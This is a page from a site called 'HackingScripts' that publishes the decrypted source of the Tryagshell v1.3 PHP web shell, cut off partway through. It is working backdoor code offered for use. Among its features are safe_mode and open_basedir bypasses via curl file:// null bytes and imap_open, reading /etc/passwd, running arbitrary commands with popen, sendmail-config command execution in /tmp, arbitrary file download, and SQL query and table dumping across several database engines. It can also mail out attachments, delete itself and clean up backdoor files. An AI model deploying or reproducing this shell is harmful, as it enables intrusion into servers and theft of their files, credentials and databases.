HackingScripts

Hack Scripts for everybody

Tryagshell v1.3 (decrypted)

28 Jan 2014

This is the encoded version of the Tryagshell (version 1.3 apparently)

You can see the encrypted version here: Tryagshell (encrypted)

Tryagshell v1.3 (decrypted) Source Code

   1 <?php
   2 /******************************************************************************************************/
   3 /*
   4 /*                                     #    #        #    #
   5 /*                                     #   #          #   #
   6 /*                                    #    #          #    #
   7 /*                                    #   
   8 ###   
   9 ###
  10 ###   
  11 ###   #
  12 /*                                   
  13 ###   
  14 ###  
  15 ###
  16 ###
  17 ###  
  18 ###   
  19 ###
  20 /*                                   
  21 ###   
  22 ###  
  23 ###
  24 ###
  25 ###  
  26 ###   
  27 ###
  28 /*                                   
  29 ###   
  30 ###   
  31 ###
  32 ###   
  33 ###   
  34 ###
  35 /*                                   
  36 ####   
  37 ###
  38 ###
  39 ###
  40 ###
  41 ###
  42 ###   
  43 ####
  44 /*                                   
  45 ###
  46 ###
  47 ###
  48 ###
  49 ###
  50 ###
  51 ###
  52 ###
  53 ###
  54 ###
  55 ###
  56 ###
  57 /*                                        
  58 ###
  59 ###
  60 ###
  61 ###
  62 ###
  63 ###
  64 ###
  65 /*                                 
  66 ###
  67 ###
  68 ###
  69 ### 
  70 ###
  71 ###
  72 ###
  73 ###
  74 ### 
  75 ###
  76 ###
  77 ####
  78 /*                                
  79 ####   
  80 ###  
  81 ###
  82 ###
  83 ###
  84 ###
  85 ###  
  86 ###   
  87 ####
  88 /*                                
  89 ####   
  90 ###  
  91 ###
  92 ###
  93 ###
  94 ###
  95 ###  
  96 ###   
  97 ####
  98 /*                                 
  99 ####   #  
 100 ###
 101 ###
 102 ###
 103 ###
 104 ###  #   
 105 ####
 106 /*                                 
 107 ####   
 108 ###  
 109 ###
 110 ###
 111 ###
 112 ###  
 113 ###   
 114 ####
 115 /*                                  
 116 ###    #   
 117 ###
 118 ###
 119 ###   #    
 120 ###
 121 /*                                   
 122 ###   #    
 123 ###
 124 ###   #    
 125 ###
 126 /*                                     
 127 ###                 
 128 ###
 129 /*
 130 /*
 131 /*
 132 /*  tryagshell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
 133 /*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
 134 /*  ??????: 1.3 (05.03.2006)
 135 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
 136 /*  ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC.
 137 /*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
 138 /*  ?? rst@void.ru. ??? ??????????? ????? ???????????.
 139 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
 140 /*  (c)oded by 1dt.w0lf
 141 /*  RST/GHC http://rst.void.ru , http://ghc.ru
 142 /*  ANY MODIFIED REPUBLISHING IS RESTRICTED
 143 /******************************************************************************************************/
 144 /* ~~~ ????????? | Options  ~~~ */
 145 // ????? ????? | Language
 146 // $language='ru' - ??????? (russian)
 147 // $language='eng' - english (??????????)
 148 $language='eng';
 149 // ?????????????? | Authentification
 150 // $auth = 1; - ?????????????? ????????  ( authentification = On  )
 151 // $auth = 0; - ?????????????? ????????? ( authentification = Off )
 152 $auth = 0;
 153 // ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
 154 // ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
 155 // ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'tryag'
 156 // Login & password crypted with md5, default is 'tryag'
 157 $name='7fea0708f4bc4266ab5efcd242028106'; // ????? ????????????  (user login)
 158 $pass='a66abb5684c45962d887564f08346e8d'; // ?????? ???????????? (user password)
 159 /******************************************************************************************************/
 160 if(empty($_POST['Mohajer22'])){
 161 } else {
 162 $m=$_POST['Mohajer22'];
 163 $ch =
 164 curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
 165 curl_exec($ch);
 166 var_dump(curl_exec($ch));
 167 }
 168 $string = !empty($_POST['string']) ? $_POST['string'] : 0;
 169 $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
 170 if ($string && $switch == "file") {
 171 $stream = imap_open($string, "", "");
 172 $str = imap_body($stream, 1);
 173 if (!empty($str))
 174 echo "<pre>".$str."</pre>";
 175 imap_close($stream);
 176 } elseif ($string && $switch == "dir") {
 177 $stream = imap_open("/etc/passwd", "", "");
 178 if ($stream == FALSE)
 179 die("Can't open imap stream");
 180 $string = explode("|",$string);
 181 if (count($string) > 1)
 182 $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
 183 else
 184 $dir_list = imap_list($stream, trim($string[0]), "*");
 185 echo "<pre>";
 186 for ($i = 0; $i < count($dir_list); $i++)
 187 echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
 188 echo "</pre>";
 189 imap_close($stream);
 190 }
 191 if ($_POST['plugin'] && ($submit == "Show")){
 192                                   $param1 = $_POST[param1];
 193                                 $param2 = $_POST[param2];
 194                                   switch($_POST['plugin']){
 195                                  case("cat /etc/passwd"):
 196                                            for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
 197                                         $ara = posix_getpwuid($uid);
 198                                                 if (!empty($ara)) {
 199                                                   while (list ($key, $val) = each($ara)){
 200                                                     print "$val:";
 201                                                   }
 202                                                   print "<br>";
 203                                                 }
 204                                         }
 205                                 break;
 206                                         case ("/bin/ls"):
 207                                                 if($param1){$exec = "/bin/ls ". $param1;}
 208                                                 else{$exec = "/bin/ls";}
 209                                                 $fp = popen("$exec", "r");
 210                                                 print $fp;
 211                                                 pclose($fp);
 212                                         break;
 213                                         case("tempnam"):
 214                                                 $cmd = $param1;
 215                                                 $script=tempnam("/tmp", "script");
 216                                                 $cf=tempnam("/tmp", "cf");
 217                                                 $fd = fopen($cf, "w");
 218                                                 fwrite($fd, "OQ/tmp Sparse=0 R$*" . chr(9) . "$#local $@ $1 $: $1 Mlocal, P=/bin/sh, A=sh $script");
 219                                                 fclose($fd);
 220                                                 $fd = fopen($script, "w");
 221                                                 fwrite($fd, "rm -f $script $cf; ");
 222                                                 fwrite($fd, $cmd);
 223                                                 fclose($fd);
 224                                                 break;
 225                                                 case("/tmp"):
 226                                                 $target_file= $param1;
 227                                                         if (!$param2){$tmp_file="/tmp/tmp.ghc";}
 228                                                         else{$tmp_file = $param2;}
 229                                                 print copy($target_file, $tmp_file);
 230                                                 $handle = fopen ($tmp_file, "r");
 231                                                  while (!feof ($handle)) {
 232                                                   $buffer = fgets($handle, 4096);
 233                                              echo $buffer;
 234                                                   }
 235                                                 fclose ($handle);
 236                                          break;
 237                                                 }
 238                                                }
 239 error_reporting(0);
 240 set_magic_quotes_runtime(0);
 241 @set_time_limit(0);
 242 @ini_set('max_execution_time',0);
 243 @ini_set('output_buffering',0);
 244 $safe_mode = @ini_get('safe_mode');
 245 $version = "1.3";
 246 if(version_compare(phpversion(), '4.1.0') == -1)
 247  {
 248  $_POST   = &$HTTP_POST_VARS;
 249  $_GET    = &$HTTP_GET_VARS;
 250  $_SERVER = &$HTTP_SERVER_VARS;
 251  }
 252 if (@get_magic_quotes_gpc())
 253  {
 254  foreach ($_POST as $k=>$v)
 255   {
 256   $_POST[$k] = stripslashes($v);
 257   }
 258  foreach ($_SERVER as $k=>$v)
 259   {
 260   $_SERVER[$k] = stripslashes($v);
 261   }
 262  }
 263 if($auth == 1) {
 264 if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
 265    {
 266    header('WWW-Authenticate: Basic realm="tryagshell"');
 267    header('HTTP/1.0 401 Unauthorized');
 268    exit("<b><a href=http://rst.void.ru>tryagshell</a> : Access Denied</b>");
 269    }
 270 }
 271 $head = '<!-- ??????????  ???? -->
 272 <html>
 273 <head>
 274 <title>MOHAJER22</title>
 275 <meta http-equiv="Content-Language" content="en-us">
 276 <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
 277 <STYLE>
 278 tr {
 279 BORDER-RIGHT:  #aaaaaa 1px solid;
 280 BORDER-TOP:    #eeeeee 1px solid;
 281 BORDER-LEFT:   #eeeeee 1px solid;
 282 BORDER-BOTTOM: #aaaaaa 1px solid;
 283 BACKGROUND-COLOR: #000000;
 284 COLOR:red;
 285 }
 286 td {
 287 BORDER-RIGHT:  #aaaaaa 1px solid;
 288 BORDER-TOP:    #eeeeee 1px solid;
 289 BORDER-LEFT:   #eeeeee 1px solid;
 290 BORDER-BOTTOM: #aaaaaa 1px solid;
 291 BACKGROUND-COLOR:black;
 292 }
 293 .table1 {
 294 BORDER-RIGHT:  #cccccc 0px;
 295 BORDER-TOP:    #cccccc 0px;
 296 BORDER-LEFT:   #cccccc 0px;
 297 BORDER-BOTTOM: #cccccc 0px;
 298 BACKGROUND-COLOR: #000000;
 299 }
 300 .td1 {
 301 BORDER-RIGHT:  #cccccc 0px;
 302 BORDER-TOP:    #cccccc 0px;
 303 BORDER-LEFT:   #cccccc 0px;
 304 BORDER-BOTTOM: #cccccc 0px;
 305 font: 7pt Verdana;
 306 }
 307 .tr1 {
 308 BORDER-RIGHT:  #cccccc 0px;
 309 BORDER-TOP:    #cccccc 0px;
 310 BORDER-LEFT:   #cccccc 0px;
 311 BORDER-BOTTOM: #cccccc 0px;
 312 }
 313 table {
 314 BORDER-RIGHT:  #eeeeee 1px outset;
 315 BORDER-TOP:    #000000 1px outset;
 316 BORDER-LEFT:   #eeeeee 1px outset;
 317 BORDER-BOTTOM: #000000 1px outset;
 318 BACKGROUND-COLOR: #000000;
 319 }
 320 input {
 321 BORDER-RIGHT:  #ffffff 1px solid;
 322 BORDER-TOP:    #999999 1px solid;
 323 BORDER-LEFT:   #999999 1px solid;
 324 BORDER-BOTTOM: #ffffff 1px solid;
 325 BACKGROUND-COLOR: #000000;
 326 COLOR: #ffffff;
 327 font: Fixedsys bold;
 328 }
 329 select {
 330 BORDER-RIGHT:  #ffffff 1px solid;
 331 BORDER-TOP:    #999999 1px solid;
 332 BORDER-LEFT:   #999999 1px solid;
 333 BORDER-BOTTOM: #ffffff 1px solid;
 334 BACKGROUND-COLOR: #993333;
 335 COLOR: #ffffff;
 336 font: 8pt Verdana;
 337 }
 338 submit {
 339 BORDER-RIGHT:  buttonhighlight 2px outset;
 340 BORDER-TOP:    buttonhighlight 2px outset;
 341 BORDER-LEFT:   buttonhighlight 2px outset;
 342 BORDER-BOTTOM: buttonhighlight 2px outset;
 343 BACKGROUND-COLOR:black;
 344 COLOR: #ffffff;
 345 width: 40%;
 346 }
 347 textarea {
 348 BORDER-RIGHT:  #ffffff 1px solid;
 349 BORDER-TOP:    #999999 1px solid;
 350 BORDER-LEFT:   #999999 1px solid;
 351 BORDER-BOTTOM: #ffffff 1px solid;
 352 BACKGROUND-COLOR: #000000;
 353 COLOR: #ffffff;
 354 font: Fixedsys bold;
 355 }
 356 BODY {
 357 margin-top: 1px;
 358 margin-right: 1px;
 359 margin-bottom: 1px;
 360 margin-left: 1px;
 361 BACKGROUND-COLOR:black;
 362 COLOR: #ffffff;
 363 }
 364 A:link {COLOR:red; TEXT-DECORATION: none}
 365 A:visited { COLOR:red; TEXT-DECORATION: none}
 366 A:active {COLOR:red; TEXT-DECORATION: none}
 367 A:hover {color:red;TEXT-DECORATION: none}
 368 </STYLE>';
 369 class zipfile
 370 {
 371     var $datasec      = array();
 372     var $ctrl_dir     = array();
 373     var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
 374     var $old_offset   = 0;
 375     function unix2DosTime($unixtime = 0) {
 376         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
 377         if ($timearray['year'] < 1980) {
 378             $timearray['year']    = 1980;
 379             $timearray['mon']     = 1;
 380             $timearray['mday']    = 1;
 381             $timearray['hours']   = 0;
 382             $timearray['minutes'] = 0;
 383             $timearray['seconds'] = 0;
 384         }
 385         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
 386                 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
 387     }
 388     function addFile($data, $name, $time = 0)
 389     {
 390         $name     = str_replace('\\', '/', $name);
 391         $dtime    = dechex($this->unix2DosTime($time));
 392         $hexdtime = '\x' . $dtime[6] . $dtime[7]
 393                   . '\x' . $dtime[4] . $dtime[5]
 394                   . '\x' . $dtime[2] . $dtime[3]
 395                   . '\x' . $dtime[0] . $dtime[1];
 396         eval('$hexdtime = "' . $hexdtime . '";');
 397         $fr   = "\x50\x4b\x03\x04";
 398         $fr   .= "\x14\x00";
 399         $fr   .= "\x00\x00";
 400         $fr   .= "\x08\x00";
 401         $fr   .= $hexdtime;
 402         $unc_len = strlen($data);
 403         $crc     = crc32($data);
 404         $zdata   = gzcompress($data);
 405         $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
 406         $c_len   = strlen($zdata);
 407         $fr      .= pack('V', $crc);
 408         $fr      .= pack('V', $c_len);
 409         $fr      .= pack('V', $unc_len);
 410         $fr      .= pack('v', strlen($name));
 411         $fr      .= pack('v', 0);
 412         $fr      .= $name;
 413         $fr .= $zdata;
 414         $this -> datasec[] = $fr;
 415         $cdrec = "\x50\x4b\x01\x02";
 416         $cdrec .= "\x00\x00";
 417         $cdrec .= "\x14\x00";
 418         $cdrec .= "\x00\x00";
 419         $cdrec .= "\x08\x00";
 420         $cdrec .= $hexdtime;
 421         $cdrec .= pack('V', $crc);
 422         $cdrec .= pack('V', $c_len);
 423         $cdrec .= pack('V', $unc_len);
 424         $cdrec .= pack('v', strlen($name) );
 425         $cdrec .= pack('v', 0 );
 426         $cdrec .= pack('v', 0 );
 427         $cdrec .= pack('v', 0 );
 428         $cdrec .= pack('v', 0 );
 429         $cdrec .= pack('V', 32 );
 430         $cdrec .= pack('V', $this -> old_offset );
 431         $this -> old_offset += strlen($fr);
 432         $cdrec .= $name;
 433         $this -> ctrl_dir[] = $cdrec;
 434     }
 435     function file()
 436     {
 437         $data    = implode('', $this -> datasec);
 438         $ctrldir = implode('', $this -> ctrl_dir);
 439         return
 440             $data .
 441             $ctrldir .
 442             $this -> eof_ctrl_dir .
 443             pack('v', sizeof($this -> ctrl_dir)) .
 444             pack('v', sizeof($this -> ctrl_dir)) .
 445             pack('V', strlen($ctrldir)) .
 446             pack('V', strlen($data)) .
 447             "\x00\x00";
 448     }
 449 }
 450 function compress(&$filename,&$filedump,$compress)
 451  {
 452     global $content_encoding;
 453     global $mime_type;
 454     if ($compress == 'bzip' && @function_exists('bzcompress'))
 455      {
 456         $filename  .= '.bz2';
 457         $mime_type = 'application/x-bzip2';
 458         $filedump = bzcompress($filedump);
 459      }
 460      else if ($compress == 'gzip' && @function_exists('gzencode'))
 461      {
 462         $filename  .= '.gz';
 463         $content_encoding = 'x-gzip';
 464         $mime_type = 'application/x-gzip';
 465         $filedump = gzencode($filedump);
 466      }
 467      else if ($compress == 'zip' && @function_exists('gzcompress'))
 468      {
 469              $filename .= '.zip';
 470         $mime_type = 'application/zip';
 471         $zipfile = new zipfile();
 472         $zipfile -> addFile($filedump, substr($filename, 0, -4));
 473         $filedump = $zipfile -> file();
 474      }
 475      else
 476      {
 477              $mime_type = 'application/octet-stream';
 478      }
 479  }
 480 function mailattach($to,$from,$subj,$attach)
 481  {
 482  $headers  = "From: $from\r\n";
 483  $headers .= "MIME-Version: 1.0\r\n";
 484  $headers .= "Content-Type: ".$attach['type'];
 485  $headers .= "; name=\"".$attach['name']."\"\r\n";
 486  $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
 487  $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
 488  if(@mail($to,$subj,"",$headers)) { return 1; }
 489  return 0;
 490  }
 491 class my_sql
 492  {
 493  var $host = 'localhost';
 494  var $port = '';
 495  var $user = '';
 496  var $pass = '';
 497  var $base = '';
 498  var $db   = '';
 499  var $connection;
 500  var $res;
 501  var $error;
 502  var $rows;
 503  var $columns;
 504  var $num_rows;
 505  var $num_fields;
 506  var $dump;
 507  function connect()
 508   {
 509           switch($this->db)
 510      {
 511            case 'MySQL':
 512             if(empty($this->port)) { $this->port = '3306'; }
 513             if(!function_exists('mysql_connect')) return 0;
 514             $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
 515             if(is_resource($this->connection)) return 1;
 516            break;
 517      case 'MSSQL':
 518       if(empty($this->port)) { $this->port = '1433'; }
 519             if(!function_exists('mssql_connect')) return 0;
 520             $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
 521       if($this->connection) return 1;
 522      break;
 523      case 'PostgreSQL':
 524       if(empty($this->port)) { $this->port = '5432'; }
 525       $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
 526       if(!function_exists('pg_connect')) return 0;
 527       $this->connection = @pg_connect($str);
 528       if(is_resource($this->connection)) return 1;
 529      break;
 530      case 'Oracle':
 531       if(!function_exists('ocilogon')) return 0;
 532       $this->connection = @ocilogon($this->user, $this->pass, $this->base);
 533       if(is_resource($this->connection)) return 1;
 534      break;
 535      }
 536     return 0;
 537   }
 538  function select_db()
 539   {
 540    switch($this->db)
 541     {
 542           case 'MySQL':
 543            if(@mysql_select_db($this->base,$this->connection)) return 1;
 544     break;
 545     case 'MSSQL':
 546            if(@mssql_select_db($this->base,$this->connection)) return 1;
 547     break;
 548     case 'PostgreSQL':
 549      return 1;
 550     break;
 551     case 'Oracle':
 552      return 1;
 553     break;
 554     }
 555    return 0;
 556   }
 557  function query($query)
 558   {
 559    $this->res=$this->error='';
 560    switch($this->db)
 561     {
 562           case 'MySQL':
 563      if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
 564       {
 565       $this->error = @mysql_error($this->connection);
 566       return 0;
 567       }
 568      else if(is_resource($this->res)) { return 1; }
 569      return 2;
 570           break;
 571     case 'MSSQL':
 572      if(false===($this->res=@mssql_query($query,$this->connection)))
 573       {
 574       $this->error = 'Query error';
 575       return 0;
 576       }
 577       else if(@mssql_num_rows($this->res) > 0) { return 1; }
 578      return 2;
 579     break;
 580     case 'PostgreSQL':
 581      if(false===($this->res=@pg_query($this->connection,$query)))
 582       {
 583       $this->error = @pg_last_error($this->connection);
 584       return 0;
 585       }
 586       else if(@pg_num_rows($this->res) > 0) { return 1; }
 587      return 2;
 588     break;
 589     case 'Oracle':
 590      if(false===($this->res=@ociparse($this->connection,$query)))
 591       {
 592       $this->error = 'Query parse error';
 593       }
 594      else
 595       {
 596       if(@ociexecute($this->res))
 597        {
 598        if(@ocirowcount($this->res) != 0) return 2;
 599        return 1;
 600        }
 601       $error = @ocierror();
 602       $this->error=$error['message'];
 603       }
 604     break;
 605     }
 606   return 0;
 607   }
 608  function get_result()
 609   {
 610    $this->rows=array();
 611    $this->columns=array();
 612    $this->num_rows=$this->num_fields=0;
 613    switch($this->db)
 614     {
 615           case 'MySQL':
 616            $this->num_rows=@mysql_num_rows($this->res);
 617            $this->num_fields=@mysql_num_fields($this->res);
 618            while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
 619            @mysql_free_result($this->res);
 620            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 621     break;
 622     case 'MSSQL':
 623            $this->num_rows=@mssql_num_rows($this->res);
 624            $this->num_fields=@mssql_num_fields($this->res);
 625            while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
 626            @mssql_free_result($this->res);
 627            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
 628     break;
 629     case 'PostgreSQL':
 630            $this->num_rows=@pg_num_rows($this->res);
 631            $this->num_fields=@pg_num_fields($this->res);
 632            while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
 633            @pg_free_result($this->res);
 634            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 635     break;
 636     case 'Oracle':
 637      $this->num_fields=@ocinumcols($this->res);
 638      while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
 639      @ocifreestatement($this->res);
 640      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 641     break;
 642     }
 643    return 0;
 644   }
 645  function dump($table)
 646   {
 647    if(empty($table)) return 0;
 648    $this->dump=array();
 649    $this->dump[0] = '
 650 ###';
 651    $this->dump[1] = '
 652 ### --------------------------------------- ';
 653    $this->dump[2] = '
 654 ###  Created: '.date ("d/m/Y H:i:s");
 655    $this->dump[3] = '
 656 ### Database: '.$this->base;
 657    $this->dump[4] = '
 658 ###    Table: '.$table;
 659    $this->dump[5] = '
 660 ### --------------------------------------- ';
 661    switch($this->db)
 662     {
 663           case 'MySQL':
 664            $this->dump[0] = '
 665 ### MySQL dump';
 666            if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
 667            if(!$this->get_result()) return 0;
 668            $this->dump[] = $this->rows[0]['Create Table'];
 669      $this->dump[] = '
 670 ### --------------------------------------- ';
 671            if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
 672            if(!$this->get_result()) return 0;
 673            for($i=0;$i<$this->num_rows;$i++)
 674             {
 675       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
 676             $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 677             }
 678     break;
 679     case 'MSSQL':
 680      $this->dump[0] = '
 681 ### MSSQL dump';
 682      if($this->query('SELECT * FROM '.$table)!=1) return 0;
 683            if(!$this->get_result()) return 0;
 684            for($i=0;$i<$this->num_rows;$i++)
 685             {
 686       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 687             $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 688             }
 689     break;
 690     case 'PostgreSQL':
 691      $this->dump[0] = '
 692 ### PostgreSQL dump';
 693      if($this->query('SELECT * FROM '.$table)!=1) return 0;
 694            if(!$this->get_result()) return 0;
 695            for($i=0;$i<$this->num_rows;$i++)
 696             {
 697       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 698             $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 699             }
 700     break;
 701     case 'Oracle':
 702       $this->dump[0] = '
 703 ### ORACLE dump';
 704       $this->dump[]  = '
 705 ### under construction';
 706     break;
 707     default:
 708      return 0;
 709     break;
 710     }
 711    return 1;
 712   }
 713  function close()
 714   {
 715    switch($this->db)
 716     {
 717           case 'MySQL':
 718            @mysql_close($this->connection);
 719     break;
 720     case 'MSSQL':
 721      @mssql_close($this->connection);
 722     break;
 723     case 'PostgreSQL':
 724      @pg_close($this->connection);
 725     break;
 726     case 'Oracle':
 727      @oci_close($this->connection);
 728     break;
 729     }
 730   }
 731  function affected_rows()
 732   {
 733    switch($this->db)
 734     {
 735           case 'MySQL':
 736            return @mysql_affected_rows($this->res);
 737     break;
 738     case 'MSSQL':
 739      return @mssql_affected_rows($this->res);
 740     break;
 741     case 'PostgreSQL':
 742      return @pg_affected_rows($this->res);
 743     break;
 744     case 'Oracle':
 745      return @ocirowcount($this->res);
 746     break;
 747     default:
 748      return 0;
 749     break;
 750     }
 751   }
 752  }
 753 if(isset($_GET['img'])&&!empty($_GET['img']))
 754  {
 755  $images = array();
 756  $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';
 757  $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';
 758  @ob_clean();
 759  header("Content-type: image/gif");
 760  echo base64_decode($images[$_GET['img']]);
 761  die();
 762  }
 763 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
 764  {
 765   if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
 766   else
 767    {
 768     @ob_clean();
 769     $filename = @basename($_POST['d_name']);
 770     $filedump = @fread($file,@filesize($_POST['d_name']));
 771     fclose($file);
 772     $content_encoding=$mime_type='';
 773     compress($filename,$filedump,$_POST['compress']);
 774     if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
 775     header("Content-type: ".$mime_type);
 776     header("Content-disposition: attachment; filename=\"".$filename."\";");
 777     echo $filedump;
 778     exit();
 779    }
 780  }
 781 if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
 782 if ($_POST['cmd']=="db_query")
 783  {
 784  echo $head;
 785  $sql = new my_sql();
 786  $sql->db   = $_POST['db'];
 787  $sql->host = $_POST['db_server'];
 788  $sql->port = $_POST['db_port'];
 789  $sql->user = $_POST['mysql_l'];
 790  $sql->pass = $_POST['mysql_p'];
 791  $sql->base = $_POST['mysql_db'];
 792  $querys = @explode(';',$_POST['db_query']);
 793  if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
 794   else
 795    {
 796    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
 797    else
 798     {
 799     foreach($querys as $num=>$query)
 800      {
 801       if(strlen($query)>5)
 802       {
 803       echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
 804       switch($sql->query($query))
 805        {
 806        case '0':
 807        echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
 808        break;
 809        case '1':
 810        if($sql->get_result())
 811         {
 812                echo "<table width=100%>";
 813         foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
 814                $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
 815         echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
 816         for($i=0;$i<$sql->num_rows;$i++)
 817          {
 818          foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
 819          $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
 820          echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
 821          }
 822         echo "</table>";
 823         }
 824        break;
 825        case '2':
 826        $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
 827        echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
 828        break;
 829        }
 830       }
 831      }
 832     }
 833    }
 834  echo "<br><form name=form method=POST>";
 835  echo in('hidden','db',0,$_POST['db']);
 836  echo in('hidden','db_server',0,$_POST['db_server']);
 837  echo in('hidden','db_port',0,$_POST['db_port']);
 838  echo in('hidden','mysql_l',0,$_POST['mysql_l']);
 839  echo in('hidden','mysql_p',0,$_POST['mysql_p']);
 840  echo in('hidden','mysql_db',0,$_POST['mysql_db']);
 841  echo in('hidden','cmd',0,'db_query');
 842  echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
 843  echo "</form>";
 844  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 845  }
 846 if(isset($_GET['delete']))
 847  {
 848    @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
 849  }
 850 if(isset($_GET['tmp']))
 851  {
 852    @unlink("/tmp/bdpl");
 853    @unlink("/tmp/back");
 854    @unlink("/tmp/bd");
 855    @unlink("/tmp/bd.c");
 856    @unlink("/tmp/dp");
 857    @unlink("/tmp/dpc");
 858    @unlink("/tmp/dpc.c");
 859  }
 860 if(isset($_GET['phpini']))
 861 {
 862 echo $head;
 863 function U_value($value)
 864  {
 865  if ($value == '') return '<i>no value</i>';
 866  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
 867  if ($value === null) return 'NULL';
 868  if (@is_object($value)) $value = (array) $value;
 869  if (@is_array($value))
 870  {
 871  @ob_start();
 872  print_r($value);
 873  $value = @ob_get_contents();
 874  @ob_end_clean();
 875  }
 876  return U_wordwrap((string) $value);
 877  }
 878 function U_wordwrap($str)
 879  {
 880  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
 881  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
 882  }
 883 if (@function_exists('ini_get_all'))
 884  {
 885  $r = '';
